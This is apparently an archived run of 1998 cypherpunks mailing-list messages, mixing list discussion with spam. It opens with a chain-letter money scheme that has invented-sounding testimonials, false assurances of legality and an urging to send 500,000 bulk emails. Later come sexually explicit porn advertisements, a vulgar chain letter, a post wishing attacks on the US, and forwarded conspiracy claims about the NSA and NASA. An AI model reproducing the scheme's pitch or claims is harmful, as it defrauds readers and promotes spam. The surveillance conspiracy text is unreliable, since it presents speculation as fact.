                              *******TIPS FOR SUCCESS*******


* TREAT THIS AS YOUR BUSINESS! Be prompt, professional, and follow 
the directions accurately.

* Send for the four reports IMMEDIATELY so you will have them when 
the orders start coming in because:

When you receive a $5 order, you MUST send out the requested
product/report to comply with the U.S. Postal & Lottery Laws, Title
18,Sections 1302 and 1341 or Title 18, Section 3005 in the U.S. Code,
also Code of Federal Regs. vol. 16, Sections 255 and 436, which state 
that "a product or service must be exchanged for money received."

* ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.

* Be patient and persistent with this program. If you follow the 
instructions exactly, the results WILL undoubtedly be SUCCESSFUL!

* ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!


                            *******YOUR SUCCESS GUIDELINE*******


Here are some guidelines to follow that can better guarantee your
success:

If you don't receive 10 to 20 orders for REPORT #1 within two weeks,
continue advertising until you do. Then, a couple of
weeks later you should receive at least 100 orders for REPORT #2. If
you don't, continue advertising until you do. Once you
have received 100 or more orders for REPORT #2, YOU CAN RELAX, because
the system is already working for you, and
the cash will continue to roll in!

THIS IS IMPORTANT TO REMEMBER:

Every time your name is moved down on the list, you are placed in front
of a DIFFERENT report. You can KEEP TRACK
of your PROGRESS by watching which report people are ordering from you.
If you want to generate more income, send
another batch of e-mails (500,000 or more) and start the whole process
again! There is no limit to the income you will
generate from this business! You can also ask a qualified bulk e-mailer
for tips on what is working the best. Find out if he or
she is participating in the pro
gram.

NOTE: If you need help with starting a business, registering a business
name, how income tax is handled, etc., contact your local office of the
Small Business Administration (a Federal agency) for free help and
answers to questions. Also, the Internal Revenue Service offers free
help
via telephone and free seminars about business taxes.

                            *******T E S T I M O N I A L S*******


This program does work, but you must follow it EXACTLY! Especially the
rule of not trying to place your name in a different position, it won't
work and you'll lose a lot of potential income. I'm living proof that
it works. It really is a great opportunity to make relatively easy
money, with
little cost to you. If you do choose to participate, follow the program
exactly, and you'll be on your way to financial security. 
Sean McLaughlin, Jackson, MS

My name is Frank. My wife, Doris, and I live in Bel-Air, MD. I am a
cost accountant with a major U.S. Corporation and I make pretty good
money. When I received the program I grumbled to Doris about receiving
"junk mail." I made fun of the whole thing, spouting my knowledge
of the population and percentages involved. I "knew" it wouldn't work.
Doris totally ignored my supposed intelligence and jumped in with
both feet. I made merciless fun of her, and was ready to lay the old "I
told you so" on her wh
en the thing didn't work... well, the laugh was on me! Within two weeks
she had received over 50 responses. Within 45 days she had received
over $147,200 in $5 bills! I was shocked! I was sure that I had it all
figured and that it wouldn't work. I AM a believer now. I have joined
Doris in
her "hobby." I did have seven more years until retirement, but I think
of the "rat race" and it's not for me. We owe it all to MLM.
Frank T., Bel-Air, MD

I just want to pass along my best wishes and encouragement to you. Any
doubts you have will vanish when your first orders come in. I even
checked with the U.S. Post Office to verify that the plan was legal. It
definitely is! IT WORKS!!!
Paul Johnson, Raleigh, NC

The main reason for this letter is to convince you that this system is
honest, lawful, extremely profitable, and is a way to get a large
amount of
money in a short time. I was approached several times before I checked
this out. I joined just to see what one could expect in return for the
minimal effort and money required. To my astonishment, I received
$36,470.00 in the first 14 weeks, with money still coming in.
Sincerely yours, Phillip A. Brown, Esq.

Not being the gambling type, it took me several weeks to make up my
mind to participate in this plan. But conservative that I am, I decided
that
the initial investment was so little that there was just no way that I
wouldn't get enough orders to at least get my money back. Boy, was I
surprised when I found my medium-size post office box crammed with
orders! For awhile, it got so overloaded that I had to start picking up
my
mail at the window. I'll make more money this year than any 10 years of
my life
before. The nice thing about this deal is that it doesn't matter where
in the U.S. the people live. There simply isn't a better investment
with a
faster return.
Mary Rockland, Lansing, MI

I had received this program before. I deleted it, but later I wondered
if I shouldn't have given it a try. Of course, I had no idea who to
contact to
get another copy, so I had to wait until I was e-mailed another
program...11 months passed then it came...I didn't delete this one!...I
made more
than $41,000 on the first try!!
D. Wilburn, Muncie, IN

This is my third time to participate in this plan. We have quit our
jobs, and will soon buy a home on the beach and live off the interest
on our
money. The only way on earth that this plan will work for you is if you
do it. For your sake, and for your family's sake don't pass up this
golden
opportunity. Good luck and happy spending!
Charles Fairchild, Spokane, WA

                         ORDER YOUR REPORTS TODAY AND GET 
                                STARTED ON YOUR ROAD TO 
                                   FINANCIAL FREEDOM!!!

*** Get The A.I.A.T Bulk Emailer FREE - Where To Get it ***
*** FAX/CALL +1 212 2082904 (US) or FAX +44 (01772) 492507 (UK) ***
*** Or Download From FireFox Freeware http://209.150.131.246 ***


---Greg Lehey  wrote:
>
> On Fri,  6 February 1998 at 18:33:36 -0800, kozmo killah wrote:
> 
> [ Nothing legible, just a web page from the Tortilla Industry
> Association ]
> 
> PLEASE stop sending this nonsense, or I'll recommend to have you taken
> off the distribution list.  Read http://www.lemis.com/email.html for
> how to send mail messages.  If you're having so much difficulty that
> you can't even send a mail message, you're obviously going to have to
> solve that problem some other way.
> 
> Greg
> 
DO YOU YAHOO!?Get your free @yahoo.com address at Yahoo! Mail.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 12 Feb 1998 08:59:25 -0800 (PST)
To: "Michael Sims" <declan@pathfinder.com>
Subject: Re: "Corporations selling your ass down the road for a dollar"
In-Reply-To: <v03007807b106593348bc@[168.161.105.216]>
Message-ID: <199802121659.LAA25269@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:10 AM 2/12/98 -0400, Michael Sims wrote:

>Except, of course, that *businesses* count as individuals in a 
>libertarian world.  Yes, the corporation, that creation wholly of 
>government, becomes a sort of super-individual - and of course all 
>individuals are equal, but some are just a bit more equal.

Except that one does not need government to form a limited liability entity.  It was never necessary.  These days in particular with secret voting protocols and anonymous communications, it would be trivial to have a limited liability entity whose owners had no personal liability for organizational debts because they are unknown and unknowable.  Yet they can control the entity without losing their anonymity.  This was always possible.  Now it is easy.

In French corporations were originally called (pardon my spelling) "socit anonime".

Certainly as a cypherpunk, you believe in anonymous organizations.

>When I see a libertarian calling for an elimination of all forms of 
>corporations 

Certainly anarcho libertarians have always opposed government "incorporation" since they opposed government.

>and a return to sole proprietorships and straight 
>partnerships as the only form of business, then I'll know he's 
>ideologically consistent.  

What about Trusts, Companies of Adventurers, lots of other things...

>But very very little time complaining about the *existence* of 
>corporations whose primary function is to shield the important folks 
>who run and fund the corporation from the consequences of their 
>actions.  Come on!  This should be a primary offense!  Individuals 
>with no responsibility!

One can't impose responsibility on all.  Thus, I may be too poor to pay if you sue me.  So don't deal with me.  If you don't want to deal with an anonymous business entity, don't.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: y1io@freexxxpics.com
Date: Thu, 12 Feb 1998 17:14:11 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: FREE XXX PICS, LIVE SEX AND MORE!! READ IF INTERESTED 100% FREE
Message-ID: <53405902_89184176>
MIME-Version: 1.0
Content-Type: text/plain



Hi there! want free porn? want pics that are updated daily? Or how about membership to XXX Adult sites, where the bill is payed by us?!? How about FREE live sex? If you do then visit http://www.sungkyul.ac.kr/~kimss/ for the BEST xxx pics, LIVE SEX, AVIs, MPEGS, and more!!!!!  
WE ARE NOT A SERVICE! THERE IS NOTHING TO SIGNUP FOR! THESE PICS ARE STRICTLY 100% FREE!!!

So hurry! and visit

http://www.sungkyul.ac.kr/~kimss/porn.html

Thank you for your time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 12 Feb 1998 18:43:50 -0800 (PST)
To: James Morris <cypherpunks@toad.com
Subject: Sabotaging Australian Involvement in Bill's War
In-Reply-To: <34E39B7C.ABBE7A6@intercode.com.au>
Message-ID: <v03102803b10962ad43f3@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:01 PM -0800 2/12/98, James Morris wrote:
>I'm just wondering if anyone else finds it particularly odd that while
>Australia is prepared to commit SAS troops, medical and intelligence
>personnel to a possible strike against Iraq, the US government still
>doesn't seem to trust us enough to use US developed cryptography
>products with adequate security.

It's not at all odd.

In the New World Order, you Aussies are children. As children, your role is
to die in wars like Viet Nam and the Gulf, under orders from the New World
Reichsfuhrer.

And like the American children sent to die in wars at age 18, but too young
to either vote or drink alchohol, children cannot be allowed to possess
dangerous crypto tools which might let them deviate from parental wishes.

(Seriously, what the holy fuck are you Aussies doing getting involved in
our Moral Leader's vanity war with Saddam? The United Nations authorized
action in 1990 to "liberate Kuwait." That was done. All this recent
folderol about "ensuring Saddam complies with inspections" is outside the
original charter. And, of course, pointless. If the U.S. launches Bill's
War, I hope it gets paid back in full with some attacks by freedom
fighters. Maybe then Amerika will lose its desire to boss the world around
and will get back to basics.)

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: feen4@juno.com (a b c)
Date: Thu, 12 Feb 1998 18:21:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: "Ryan McDonald" <datahaven@hotmail.com>: Fwd:
Message-ID: <19980212.190031.3782.12.feen4@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


--------- Begin forwarded message ----------
From: "Ryan McDonald" <datahaven@hotmail.com>
To: brandann@hotmail.com, mitya@demis.belpak.minsk.by,
ddement@hotmail.com,Yablo@hotmail.com, bigspring1@juno.com,
anagramm@hotmail.com,sirus1@juno.com, feen4@juno.com,
pleontks@hotmail.com
Subject: Fwd:
Date: Wed, 11 Feb 1998 21:05:28 PST
Message-ID: <19980212050531.25108.qmail@hotmail.com>




>Received: from 207.98.182.106 by www.hotmail.com with HTTP;
>	Sat, 31 Jan 1998 15:33:30 PST
>X-Originating-IP: [207.98.182.106]
>From: "Perrin ." <pleontks@hotmail.com>
>To: wilbersbabe@hotmail.com, phoebusapollo@mail.geocities.com,
>    parcha@hotmail.com, cypherpunks@toad.com, deanna@keylink.net,
>    cjensen@smtplink.rockford.edu, yablo@hotmail.com, 
flood69@hotmail.com,
>    ftaylor@seer.stetson.edu, punkoff@usa.net, 
louisadamnit@hotmail.com,
>    nailbomb666@hotmail.com, yuhai@hotmail.com, pierre@netins.net,
>    jewlie@nwiowa.com, mansonswonka@hotmail.com, jonesy@mindless.com,
>    sjackson@inreach.com, kirijane@hotmail.com,
>    wrightk@tron.cochise.cc.az.us, 727233@ican.net, 
luvdust@hotmail.com,
>    tanyak@winshop.com.au, lrigyeknom01@rocketmail.com, 
mrspots@sinosa.com,
>    nefurah@hotmail.com, thalion.taur@juno.com, 
childprodigy@mailexcite.com,
>    mix69@hotmail.com, philip@infospeedway.net, datahaven@hotmail.com,
>    papa@micoks.net, sparkles4@hotmail.com, shandave@hotmail.com,
>    tabnit@hotmail.com, thetigress_@hotmail.com, 
thumper_069@hotmail.com,
>    jacket9@primenet.com, Yankee1428@aol.com, bluelover2000@yahoo.com
>Subject: Fwd:
>Content-Type: text/plain
>Date: Sat, 31 Jan 1998 15:33:30 PST
>
>>
>>
>>LIST OF POSSIBLE SLOGANS PROMOTING NATIONAL CONDOM WEEK
>>
>>1.  COVER YOUR STUMP BEFORE YOU HUMP
>>
>>2.  BEFORE YOU ATTACK HER, WRAP YOUR WHACKER
>>
>>3.  DON'T BE SILLY, PROTECT YOUR WILLY
>>
>>4.  WHEN IN DOUBT, SHROUD YOUR SPOUT
>>
>>5.  DON'T BE A LONER, COVER YOUR BONER
>>
>>6.  YOU CANT GO WRONG IF YOU SHIELD YOUR DONG
>>
>>7.  IF YOU'RE NOT GOING TO SACK IT, GO HOME AND WHACK IT.
>>
>>8.  IF YOU THINK SHE'S SPUNKY COVER YOUR MONKEY
>>
>>9.  IF YOU SLIP BETWEEN HER THIGHS, BE SURE TO CONDOMIZE
>>
>>10.  IT WILL BE SWEETER IF YOU WRAP YOUR PETER
>>
>>11.  SHE WONT GET SICK IF YOU WRAP YOUR DICK
>>
>>12.  IF YOU GO IN TO HEAT, PACKAGE YOUR MEAT
>>
>>13.  WHILE YOUR UNDRESSING VENUS, DRESS UP YOUR PENIS
>>
>>14.  WHEN YOU TAKE OFF HER PANTS AND BLOUSE, SLIP UP YOUR 
>>TROUSER  MOUSE
>>
>>15.  ESPECIALLY IN DECEMBER, GIFT WRAP YOUR MEMBER
>>
>>16.  NEVER, NEVER DECK HER WITH AN UNWRAPPED PECKER
>>
>>17.  DON'T BE A FOOL, VULCANIZE YOUR TOOL
>>
>>18.  THE RIGHT SELECTION WILL PROTECT YOUR ERECTION
>>
>>19.  WRAP IT IN FOIL BEFORE CHECKING HER OIL
>>
>>20.  A CRANK WITH ARMOR WILL NEVER HARM HER
>>
>>21.  NO GLOVE, NO LOVE!
>>
>>
>>YOU WILL EXPERIENCE GREAT SEX WITHIN FOUR DAYS OF
>>RECEIVING THIS LETTER, PROVIDED YOU SEND IT ON.
>>Since the copy must tour the world, you must make ten copies and send 
>>them to others.
>>
>>This is no joke.  Send no money. Send copies to people who need to get 
>>laid within 96 hours. You have been selected to receive this letter 
>>because the person  who sent this to you either thinks you need good 
>>luck or they want to send  the curse of this letter on to you.
>>
>>IF YOU SEND THIS TO:
>>
>>0 people...  Your life will be a living hell
>>1-3 people...  Your next relationship will be fun but 
>>won't last long
>>4-6 people...  Someone will get a crush on you
>>7-10 people...  You will get a date for Friday night
>>11-14 people...  You will get a date for the next school 
>>dance
>>15-18 people...  Your crush will ask for your number
>>19-24 people...  You will meet the person of your dreams
>>25-29 people...  Your crush will ask you out
>>30-34 people...  Your next relationship will last long and be 
>>good
>>35-37 people...  You will live long enough and have a good life and 
>>get lots of sex!
>>
>>You must send this in 1 day after reading it. If you do 
>>not send this to anyone your life will be a living hell. The more 
>people 
>>you send this letter to the more luck you will have.
>>
>
>
>______________________________________________________
>Get Your Private, Free Email at http://www.hotmail.com


Join the Dark Army of Mephistopheles!!!

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com

--------- End forwarded message ----------

_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Thu, 12 Feb 1998 22:21:13 -0800 (PST)
To: Lizard <declan@pathfinder.com>
Subject: Re: "Corporations selling your ass down the road for a dollar"
In-Reply-To: <199802121211.HAA19946@arutam.inch.com>
Message-ID: <v03110723b10993b03d46@[207.94.250.77]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:50 AM -0800 2/12/98, Lizard wrote:
>I've been saying that for a long time. I'm not 100% certain I wish to
>eliminate entirely the corporation, but the idea of an 'artificial person'
>as an entity to take the blame for crimes committed by real people is
>highly dubious to me. If Monty Burns says, "Let's dump the toxic waste in
>the school ground, who cares if some kids die!", then it should be he who
>faces criminal charges -- not his corporation which gets fined.

I fully agree, and I think US law agrees, that an illegal act by an
employee is not shielded by incorporation.  But as many people on this list
have noted, what the law says, and what is enforced are widely different.

Probably the most valuable feature of corporations is the way they limit
the financial liability of their stockholders and managers.  This limit
allows people to go into business without having to worry about business
creditors coming to take their houses and cars.  (And wives and first born
:-)

Since everyone knows what the deal is, there is no fraud.  Everyone
extending credit to a corporation knows that it is the corporation's credit
rating which is relevant, not the credit ratings of the members of the
board of directors.

Limited liability, coupled with the willingness of venture capitalists to
fund ventures lead by people whose previous ventures have failed, are the
engine which allows Silicon Valley's creative destruction approach to
making money succeed.


-------------------------------------------------------------------------
Bill Frantz       | Market research shows the  | Periwinkle -- Consulting
(408)356-8506     | average customer has one   | 16345 Englewood Ave.
frantz@netcom.com | teat and one testicle.     | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Thu, 12 Feb 1998 19:54:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re:  Sabotaging Australian Involvement in Bill's War
Message-ID: <199802130354.WAA28444@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


   >   Date: Thu, 12 Feb 1998 18:45:38 -0800
   >   To: James Morris <jmorris@intercode.com.au>, cypherpunks@toad.com
   >   From: Tim May <tcmay@got.net>
   >   Subject: Sabotaging Australian Involvement in Bill's War
   >   
   >   At 5:01 PM -0800 2/12/98, James Morris wrote:
   >   >I'm just wondering if anyone else finds it particularly odd that while
   >   >Australia is prepared to commit SAS troops, medical and intelligence
   >   >personnel to a possible strike against Iraq, the US government still
   >   >doesn't seem to trust us enough to use US developed cryptography
   >   >products with adequate security.
   >   
   >   It's not at all odd.
   >   
   >   In the New World Order, you Aussies are children. As children, your role is
   >   to die in wars like Viet Nam and the Gulf, under orders from the New World
   >   Reichsfuhrer.
   >   
   >   And like the American children sent to die in wars at age 18, but too young
   >   to either vote or drink alchohol, children cannot be allowed to possess
   >   dangerous crypto tools which might let them deviate from parental wishes.
   >   
   >   (Seriously...

The Aussies are obligated by treaty for the crypto/spying stuff.

We Americans spy on all your domestic traffic by treaty.

You can also request specifically targeted AU-domestic information
from our personnel manning in AU the spy equipment, and we hand it
to them.

That's what the UKUSA (pronounced you-koo-za) agreement is all about:
none of your people have broken any domestic spy laws. The British
provide that service for us in Fort Meade, VA, we provide that service
to the British in Menwith Hill...

The EU recently declared the NSA was performing massive EU-domestic
spying: that's how we have access. (It also confirms the entire
massive US-domestic NSA spying claim of the Cryptography Manifesto)

There has been a stunning lack of outrage to the EU statement: I'd
have thought USA-based privacy groups and reporters would jump all
over it.

#   "Moynihan Says U.S. Killed His Anti-Spy Measure"
#   By Irvin Molotsky, The New York Times, September 11, 1985
#
#   Senator Daniel Patrick Moynihan charged that the CIA and State Department
#   had killed a measure he had introduced aimed at protecting American
#   citizens from having their telephone conversations intercepted by foreign
#   agents in this country.
#
#   The Senator's bill would have made telephone call interception by foreign
#   agents illegal and would have provided for their expulsion.
#
#   The Chairman of the Select Committee on Intelligence opposed the measure
#   as unnecessary and could lead to disclosing "sensitive intelligence
#   sources."
 
British wiretappers at the helm of the NSA's domestic spy-fest.
 


You are "secondary" parties to the treaty...low on the totem pole.

See the Cryptography Manifesto at:

   http://www.erols.com/paulwolf/cointelpro/cointel.htm

(scroll down once there).

Here is the Australian section...

You'll have to purchase the "Project L.U.C.I.D." book for more details
[that I snipped] from the Australian "National Surveillance" report.

Snipped: some Australian politicians chased around trying to find out what 
the NSA was doing, then reversing themselves ("nothing's happening..").

I have to admit, it wasn't until I read this Australian report that
I realized most of NASA's space shots were military.
---guy


******************************************************************************


                        Australian ECHELON Spotted
                        ---------- ------- -------

*   http://www.texemarrs.com, Living Truth Ministries 800/234-9673

Texe Marrs and his organization are big on the "Anti-Christ" aspects of all
the technology the UKUSA governments have deployed to monitor people.

I am just glad he knows the Beast when he sees it, that it is Evil (without
the people involved necessarily being evil in intent: agreed!) and that
unless we do something soon, it will be too late: Earth will become Hell.

His book-jacket bio: Texe Marrs was a career U.S. Air Force officer (retired).
He commanded communications-electronics and engineering units around the globe.

*   "Project L.U.C.I.D.", by Texe Marrs, 1996, ISBN 1-884302-02-5
*   
*   Appendix 2: World Surveillance Headquarters
*   
*   The report that follows, originally entitled "National Surveillance", was
*   written by Australia's Peter Sawer and published in Inside News (P.O. Box
*   311, Maleny, Queensland 4552, Australia). It first came to my attention
*   when it was printed in the U.S. by LtCol Archibald E. Robert's Bulletin,
*   the newsletter of the highly respected Committee to Restore the Constitu-
*   tion (P.O. Box 986, Fort Collins, Colorado 80522).
*   
*   The article caused a flurry of activity and a round of vigorous denials,
*   admissions, coverups, and more denials by Australian political leaders.
*   
*   The article contends that (1) America's National Security Agency (NSA)
*   is the world surveillance headquarters, and (2) Australia has it's own
*   secret "computer center", linked with the NSA via satellite, which
*   illegally watches over Australia's citizenry.

Article snippets... capitalization by the original authors...

*   On a fateful fall day in America, on November 4th, 1952, a new United
*   States government agency quietly was brought into existence through
*   presidential decree.
*   
*   The birth of the National Security Agency on that day so long ago
*   heralded the beginning of the world's most sophisticated and all
*   encompassing surveillance system, and the beginnings of the greatest
*   threat to individual liberty and freedom not only in Australia, but
*   the entire planet will ever see.
*   
*   The NSA grew out of the post war "Signals Intelligence" section of the
*   U.S. War Department. It is unique amongst government organizations in
*   America, and indeed most other countries, in that there are NO specified
*   or defined limits to its powers.
*   
*   The NSA can (and does) do just about whatever it wants, whenever, and
*   wherever it wants. Although little known in both the U.S. and elsewhere,
*   the NSA is quite literally the most powerful organization in the world.
*   
*   Not limited by any law, and answerable only to the U.S. National Security
*   Council through COMSEC, the NSA now controls an information and
*   surveillance network around the globe that even Orwell, in his novel
*   "1984", could not have imagined.
*   
*   Most people believe that the current "computer age" grew out of either
*   the space program or the nuclear weapons race; it did not.
*   
*   ALL significant advances in computer technology over the last thirty
*   years, from the very beginnings of IBM, through to the super computers
*   of today, have been for the NSA. In fact, the world's very first super
*   computer, the awe-inspiring CRAY, was built to specification for the
*   NSA, and installed in their headquarters in 1976.
*   
*   The entire twentieth century of development of computer technology has
*   been the result of the NSA's unquenchable thirst for ever bigger, ever
*   faster machines on which to collect, collate, and cross-reference data
*   on hundreds of millions of honest, law-abiding, and totally unsuspecting
*   individuals. And not only in America, but in many other countries as
*   well. Including, as we shall see, Australia.

[
    "The Rise of the Computer State", David Burnham, 1984

    p134: ...the technical advances that were occurring did so not entirely
    by chance. The computers' ability to acquire, organize, store and
    retrieve huge amounts of data was an essential factor leading to the
    broad definition of intelligence that was fostered by the National
    Security Agency and its godfather, the National Security Council.

    Computer research was supported by NSA in a major way by secret research
    dollars. Thomas C. Reed, Director of the Pentagon's Telecommunications,
    Command and Control System, referring to domestic intercity telephone
    microwave radio trunks, said in 1975, "Modern computer techniques make
    it possible to sort through that traffic and find target conversations
    easily."

    p126-127: Since the wiretap law barred the Bureau of Narcotics and
    Dangerous Drugs from installing a tap on New York City's Grand Central
    Station pay phones, bureau head John Ingersoll asked the NSA for help.

    Within a few months the spy agency was sorting through all the
    conversations it was already acquiring for general intelligence
    purposes.

    Of course, the technicians were required to acquire, monitor, and
    discard a large number of calls made by people with no connection
    with the cocaine business in South American cities.

    But so pleased was Mr. Ingersoll with the tips he was getting from the
    dragnet monitoring that he ultimately persuaded the NSA to monitor
    simultaneously nineteen other U.S. communication hubs.

]

*   "Project L.U.C.I.D.", continued...
*   
*    Fort Meade is the hub of an information gathering octopus whose tentacles
*    reach out to the four corners of the earth.
*    
*    The principal means of communicating this information is by the National
*    Aeronautical and Space Administration (NASA) satellite communications
*    system, which most people erroneously think exists primarily for the
*    space program.
*    
*    It does not.
*    
*    The satellites, indeed NASA and the entire American Space Program, exist
*    largely to supply the NSA with its telecommunications system. That is why
*    the bulk of its operations are officially declared 'secret'. This
*    ultimate 'Big Brother' machine even has an official name 'Project
*    Platform'.

[
    "The Puzzle Palace": all these computer systems are linked together
    under Project Platform. The first Cray went to the NSA. p138
]

*   Although the NSA was officially formed in 1952, it grew out of an
*   International Agreement signed in 1947. Officially termed the "UKUSA
*   PACT," this was an agreement between Britain, the U.S.A., Canada, New
*   Zealand, Australia and the NATO countries.
*   
*   The UKUSA PACT was, quite simply and bluntly, an agreement between these
*   countries to collect and collate information on their respective citizens
*   and to share this information with each other and pass on to Fort Meade.
*   
*   On March 9th 1977, the Leader of the Opposition, Mr. Bill Hayden, asked
*   "questions on notice" on the subject. On April 19, Prime Minister Malcom
*   Fraser, declined to answer the questions, "in the interests of national
*   security."
*   
*   The first clue of the Australian Headquarters of PROJECT PLATFORM appeared
*   in 1975. Then, as today, government undertakings involving expenditure
*   over a certain amount must be presented to a Senate body, the Joint
*   Parliamentary Accounts Committee (JPAC). In 1975 JPAC was asked to
*   examine and approve finance for the construction of a new building in
*   Deakin, a leafy suburb of Canberra.
*   
*   This quite massive building was to be constructed behind an existing, much
*   smaller one, which, until then, had been known to the public only as the
*   "Deakin Telephone Exchange."
*   
*   That it was not, and never had been, simply a "telephone exchange" finally
*   came to light in the 1975 JPAC Approval Report, when it admitted that the
*   existing building had a comprehensive basement which housed NASA's micro-
*   wave communications headquarters in Australia. Part of the justification
*   of the "need" for the new, much larger building, was that by 1980, it was
*   expected that NASA would run out of room in their existing home.
*   
*   Apart from NASA, it is now admitted that Deakin houses the National
*   Computer Headquarters for, amongst others, the Australian Defense
*   Department, the Australian Taxation Office, the Department of Social
*   Security, the Commonwealth Department of Education, and the Department
*   of Transport and Communications.
*   
*   Both Tax and Social Security are, in turn, directly linked to Medicare.
*   In fact, the Department of Health used Social Security's computer
*   facilities there until their own were completed.
*   
*   A small, but highly significant, part of the building is, in fact,
*   occupied by Telecom. This is the part that contains the networking
*   junctions for the optical-fiber lines leased by the banks for their
*   "Electronic Funds Transfer System" (EFTS). ALL financial transactions
*   for the banks pass through there via subsidiary company, "Funds
*   Transfers Services Pty Ltd." (FTS)


*   The New York Times INTERNATIONAL Wednesday, May 21, 1997
*   by Clyde H. Farnsworth, Woomera, Australia.
*   
*   As Darth Vader's Death Star is blown to bits in the newly remastered "Star
*   Wars" at the local theater, the audience of Australian and American Air
*   Force personnel, and squadrons of their children, lets out a whoop. As the
*   lights go on, everyone is beaming.
*   [snip]
*   
*   Pine Gap employs nearly 1,000 people, mainly from the CIA and the U.S.
*   National Reconnaissance Office.
*   
*   It is the ground station for a U.S. satellite network that intercepts
*   telephone, radio, data links and other communications around the world.

Worldwide telephone interception.


******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Thu, 12 Feb 1998 20:19:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re:  Regulators back down on SEC/NASD email snooping rules
Message-ID: <199802130419.XAA29697@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


   >   From: Don "Free Radical" McLean <declan@well.com>
   >   Date: Thu, 12 Feb 1998 14:27:19 -0800 (PST)
   >   Subject: Regulators back down on SEC/NASD email snooping rules
   >   
   >   Last Friday I wrote in Netly about the SEC approving rules dealing with
   >   email snooping on home computers and the potential privacy violations: 
   >   
   >    http://cgi.pathfinder.com/netly/opinion/0,1042,1731,00.html
   >      
   >   These rules were to take effect on February 15. Now, citing "concerns that
   >   have been voiced," the NASD has backed down and is considering changes.
   >   
   >   Score one for privacy, or at least a more cautious approach.

Damn, wish I could affect the real world too.

----

The "cautious approach" is simply ordering all employees
to send work-related email via the company systems.
---guy

   Where I can monitor it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Fri, 13 Feb 1998 01:49:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <4a7a63d6ddc3e466ede1e561740bd106@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain


I'm in El Paso Texas... so close to the border
I can see Old Mex outside my window as I write this..
I'm over there nearly every day for lunch ( I actually
walk there from my house it's so close) If I write
a crypto program on my laptop over there and ftp
it to a web page I have on a server outside the US
will I have avoided the foolish export regs??
Does anyone know of someone trying this before?? 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Fri, 13 Feb 1998 02:25:25 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Fri Feb 13 '98
Message-ID: <19980213082113.26521.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Friday's issue of Eureka!

KARA'S ADULT PLAYGROUND
With 15 live sex shows, 1,300 Hardcore XXX videos, 1,000s of
Hardcore  and Softcore  Pix,  the  VaVoom  monthly magazine,
Kara's  exclusive monthly centrefolds,  adult games,  erotic
stories  and even casino  and sports  betting,  you won't be
going out for weeks particularly now that you can get a FREE
trial - your eyes will be popping out of your head!  Hahaha!
Kara's Playground ...... http://www.rjbtelcom.com/eplay.html

James And Victoria's Erotic Site
http://www.jamesandvictoria.com/ads/ads.cgi?advert=eureka
Our free site has hundreds of photos, thousands of erotic
stories, personal ads and several chat rooms.

UPSKIRTS AND PANTYHOSE LINKS
Quick, go to the bottom of this page and check out the links
marked contributors pics.  Here you will find a group of odd
images sent in by people out on the internet.  Pantyhose and
underwear shots.  Watch out for steamy wet patches in there!
Upskirts .................. http://serve.com/teenet/idx2.htm

EVERY MAN'S DREAM
Sometimes we have to go all the way to Denmark to deliver
great porn to you.  This website is simple but boy does it
deliver!  Tons of great free pussy pix!  Chicks before they
had breast implants, blondes, brunettes.  Two galleries. Go
there right now.  200 hundred images of pure sweet pussy!
Every Man's Dream ....... http://hjem.get2net.dk/dream/1.htm

DIRTY DIANA
My kind of dirty.  A georgeous young black haired beauty who
shows her tits and ass to all of us.  Wait!  She even has a
few free video clips.  Check out the hot tub pussy rubbing!
Dirty Diana ..................... http://www.dirtydiana.com/

FREEPICS
Cruise way down the page to the area called, Girls that put 
things way up their Cunts!  Check out the aluminium baseball
bat shoved up this girls pussy. I guess strikes one your in!
Freepics ............. http://38.15.25.227/freepics/main.htm

READ THIS!! WIN $25,000 and a Fantasy Date - Click Here Now!
$25,000! ---> http://208.195.150.31/us/us_main.cgi/us_5267/A

HOORAY! THE ADULT SEARCH ENGINE
Now you can search for the sex sites you are looking for and
fast!  This new search engine is setting the standard others
will follow.  It offers pop-up search and detailed listings!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
